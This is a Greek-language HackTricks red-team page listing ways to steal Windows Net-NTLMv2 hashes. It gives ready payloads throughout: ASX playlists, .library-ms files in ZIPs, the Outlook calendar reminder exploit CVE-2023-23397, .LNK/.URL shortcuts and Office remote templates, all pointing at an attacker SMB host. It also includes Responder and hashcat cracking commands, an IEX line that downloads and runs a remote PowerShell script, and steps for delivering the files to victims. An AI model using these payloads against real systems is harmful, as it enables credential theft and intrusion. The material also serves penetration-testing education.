Τοποθεσίες για να κλέψετε NTLM creds

Reading time: 7 minutes

tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Δείτε όλες τις εξαιρετικές ιδέες από https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ — από το download ενός Microsoft Word αρχείου online έως το ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md και https://github.com/p0dalirius/windows-coerced-authentication-methods

Λίστες αναπαραγωγής Windows Media Player (.ASX/.WAX)

Αν καταφέρετε να πείσετε έναν στόχο να ανοίξει ή να προεπισκοπήσει μια λίστα αναπαραγωγής Windows Media Player που ελέγχετε, μπορείτε να leak Net‑NTLMv2 δείχνοντας την εγγραφή σε μια UNC διαδρομή. Το WMP θα επιχειρήσει να ανακτήσει τα αναφερόμενα μέσα μέσω SMB και θα αυθεντικοποιηθεί αυτόματα.

Παράδειγμα payload:

xml
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>

Συλλογή και cracking ροή:

bash
# Capture the authentication
sudo Responder -I <iface>

# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt

ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)

Το Windows Explorer χειρίζεται με ανασφαλή τρόπο τα αρχεία .library-ms όταν ανοίγονται απευθείας μέσα από ένα ZIP αρχείο. Εάν ο ορισμός της βιβλιοθήκης δείχνει σε απομακρυσμένη UNC διαδρομή (π.χ., \attacker\share), η απλή περιήγηση/εκτέλεση του .library-ms μέσα στο ZIP προκαλεί το Explorer να κάνει enumeration της UNC και να αποστείλει NTLM authentication στον attacker. Αυτό αποδίδει ένα NetNTLMv2 που μπορεί να σπάσει offline ή ενδεχομένως να γίνει relayed.

Ελάχιστο .library-ms που δείχνει σε attacker UNC

xml
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Operational steps

  • Δημιουργήστε το .library-ms αρχείο με το XML πιο πάνω (set your IP/hostname).
  • Zip it (on Windows: Send to → Compressed (zipped) folder) και παραδώστε το ZIP στον στόχο.
  • Run an NTLM capture listener και περιμένετε το θύμα να ανοίξει το .library-ms από το εσωτερικό του ZIP.

Outlook calendar reminder sound path (CVE-2023-23397) – zero‑click Net‑NTLMv2 leak

Το Microsoft Outlook για Windows επεξεργαζόταν την επεκταμένη ιδιότητα MAPI PidLidReminderFileParameter σε αντικείμενα ημερολογίου. Αν αυτή η ιδιότητα έδειχνε σε UNC path (π.χ. \attacker\share\alert.wav), το Outlook θα επικοινωνούσε με το SMB share όταν ενεργοποιείτο η υπενθύμιση, προκαλώντας leak του Net‑NTLMv2 του χρήστη χωρίς καμία ενέργεια. Αυτό διορθώθηκε στις 14 Μαρτίου 2023, αλλά παραμένει ιδιαίτερα σχετικό για παρωχημένα ή αμετάβλητα συστήματα και για ιστορική διερεύνηση περιστατικών.

Γρήγορη εκμετάλλευση με PowerShell (Outlook COM):

powershell
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav

Πλευρά Listener:

bash
sudo responder -I eth0  # or impacket-smbserver to observe connections

Σημειώσεις

  • Το θύμα χρειάζεται μόνο να εκτελείται το Outlook for Windows όταν ενεργοποιηθεί η υπενθύμιση.
  • Το leak αποδίδει Net‑NTLMv2 suitable for offline cracking or relay (not pass‑the‑hash).

.LNK/.URL icon-based zero‑click NTLM leak (CVE‑2025‑50154 – bypass of CVE‑2025‑24054)

Το Windows Explorer αποδίδει αυτόματα τα εικονίδια συντομεύσεων. Πρόσφατη έρευνα έδειξε ότι ακόμη και μετά το patch της Microsoft του Απριλίου 2025 για τα UNC‑icon shortcuts, ήταν ακόμα δυνατό να ενεργοποιηθεί NTLM authentication χωρίς κλικ φιλοξενώντας τον στόχο της συντόμευσης σε διαδρομή UNC και κρατώντας το εικονίδιο τοπικό (patch bypass assigned CVE‑2025‑50154). Η απλή προβολή του φακέλου προκαλεί το Explorer να ανακτήσει metadata από τον απομακρυσμένο στόχο, εκπέμποντας NTLM στον επιτιθέμενο SMB server.

Minimal Internet Shortcut payload (.url):

ini
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0

Συντόμευση προγράμματος payload (.lnk) μέσω PowerShell:

powershell
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe"  # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()

Ιδέες παράδοσης

  • Βάλτε τη συντόμευση σε ένα ZIP και πείστε το θύμα να το περιηγηθεί.
  • Τοποθετήστε τη συντόμευση σε ένα εγγράψιμο share που το θύμα θα ανοίξει.
  • Συνδυάστε με άλλα αρχεία-δόλωμα στον ίδιο φάκελο ώστε ο Explorer να προεπισκοπεί τα στοιχεία.

Office remote template injection (.docx/.dotm) to coerce NTLM

Τα Office έγγραφα μπορούν να αναφερθούν σε ένα εξωτερικό πρότυπο. Αν ορίσετε το συνημμένο πρότυπο σε μια UNC διαδρομή, το άνοιγμα του εγγράφου θα αυθεντικοποιήσει στο SMB.

Ελάχιστες αλλαγές στις σχέσεις DOCX (μέσα στο word/):

  1. Επεξεργαστείτε word/settings.xml και προσθέστε την αναφορά στο συνημμένο πρότυπο:
xml
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
  1. Επεξεργαστείτε word/_rels/settings.xml.rels και δείξτε το rId1337 στο UNC σας:
xml
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
  1. Συσκευάστε ξανά σε .docx και παραδώστε. Εκτελέστε τον SMB capture listener σας και περιμένετε το άνοιγμα.

Για ιδέες μετά το capture σχετικά με relaying ή abusing NTLM, δείτε:

HackTricks

References

tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks